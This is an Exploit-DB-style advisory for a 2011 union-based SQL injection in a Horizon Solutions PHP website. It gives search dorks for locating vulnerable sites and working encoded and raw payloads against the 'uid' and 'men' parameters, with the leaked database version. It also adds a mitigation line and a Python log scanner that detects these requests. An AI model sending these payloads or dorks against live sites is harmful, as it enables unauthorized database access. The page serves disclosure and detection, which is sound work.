Vendor: Horizon
By: Iolo Morganwg
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Horizon
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: a:horizonsolutions:horizon
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2011

Horizon SQLi

The Horizon Solutions website is vulnerable to union-based SQL injection. Both the 'uid' and 'men' parameters are vulnerable. An example of an encoded URL exploit is '/fshow.php?uid=HORIZON3&men=-4649%27%20UNION%20ALL%20SELECT%20CONCAT%28CHAR%2858%2C119%2C117%2C97%2C58%29%2CIFNULL%28CAST%28version%28%29%20AS%20CHAR%29%2CCHAR%2832%29%29%2CCHAR%2858%2C99%2C105%2C99%2C58%29%29%23%20'. An example of an un-encoded URL exploit is 'GET /fshow.php?uid=HORIZON3&men=-4649' UNION ALL SELECT CONCAT(CHAR(58,119,117,97,58),IFNULL(CAST(version() AS CHAR),CHAR(32)),CHAR(58,99,105,99,58))# HTTP/1.1'. The query answer is '5.1.55-log:cic:'.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
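
A defender-side check for the request shape described above, as an added example that is not part of the original advisory: it scans access-log lines for requests to /fshow.php whose decoded 'uid' or 'men' value carries union-based injection indicators. The combined log format, the indicator list and the log lines are assumptions constructed here; the two flagged request targets are the ones quoted in the advisory.

```python
import re
from urllib.parse import parse_qsl

WATCHED = {"uid", "men"}  # parameters the advisory names as injectable

# Indicators checked against each decoded parameter value (assumed list).
INDICATORS = {
    "union-select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
    "quote": re.compile(r"'"),
    "sql-comment": re.compile(r"#|--\s|/\*"),
    "version-call": re.compile(r"\bversion\s*\(", re.I),
}

# Request line of an (assumed) combined-format access log entry. The target is
# matched lazily up to " HTTP/x" so raw, un-encoded spaces in it are tolerated.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?)\s+HTTP/\d(?:\.\d)?"')


def scan_line(line):
    """Return {param: [indicator, ...]} for suspicious uid/men values."""
    m = REQUEST.search(line)
    if not m:
        return {}
    path, _, query = m.group(1).partition("?")
    if not path.endswith("/fshow.php"):
        return {}
    hits = {}
    for name, value in parse_qsl(query, keep_blank_values=True):  # URL-decodes
        found = [k for k, rx in INDICATORS.items() if rx.search(value)]
        if name in WATCHED and found:
            hits[name] = found
    return hits


def scan_log(lines):
    # [(line_number, hits)] for every line with at least one hit
    return [(n, h) for n, line in enumerate(lines, 1) if (h := scan_line(line))]


def _entry(target):  # constructed log line; address is from a documentation range
    return f'192.0.2.44 - - [01/Jan/2024:10:00:00 +0000] "GET {target} HTTP/1.1" 200 512'


ENCODED = "/fshow.php?uid=HORIZON3&men=-4649%27%20UNION%20ALL%20SELECT%20CONCAT%28CHAR%2858%2C119%2C117%2C97%2C58%29%2CIFNULL%28CAST%28version%28%29%20AS%20CHAR%29%2CCHAR%2832%29%29%2CCHAR%2858%2C99%2C105%2C99%2C58%29%29%23%20"
RAW = "/fshow.php?uid=HORIZON3&men=-4649' UNION ALL SELECT CONCAT(CHAR(58,119,117,97,58),IFNULL(CAST(version() AS CHAR),CHAR(32)),CHAR(58,99,105,99,58))# "
SAMPLE_LOG = [_entry("/fshow.php?uid=HORIZON3&men=12"), _entry(ENCODED), _entry(RAW)]

if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG):
        print(n, hits)
```

The "quote" and "sql-comment" indicators assume that legitimate 'uid' and 'men' values are plain identifiers; on a parameter that carries free text they would need to be dropped or narrowed.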
Source

Exploit-DB raw data:

# Exploit Title: Horizon SQLi
# Google Dork: intext:"Site by Horizon"
#            : inurl:"uid=HORIZON3"
# Date: 03/05/2011
# Author: Iolo Morganwg
# Category: Web App
# Version: PHP
# Tested on: Windows XP
# Vendor: http://www.horizonsolutions.tv/
# Notes: Both params are vulnerable to union based sqli

# Encoded (URL) Example
/fshow.php?uid=HORIZON3&men=-4649%27%20UNION%20ALL%20SELECT%20CONCAT%28CHAR%2858%2C119%2C117%2C97%2C58%29%2CIFNULL%28CAST%28version%28%29%20AS%20CHAR%29%2CCHAR%2832%29%29%2CCHAR%2858%2C99%2C105%2C99%2C58%29%29%23%20

# Un-Encoded Example
GET /fshow.php?uid=HORIZON3&men=-4649' UNION ALL SELECT
CONCAT(CHAR(58,119,117,97,58),IFNULL(CAST(version() AS
CHAR),CHAR(32)),CHAR(58,99,105,99,58))#  HTTP/1.1

# Query Answer
5.1.55-log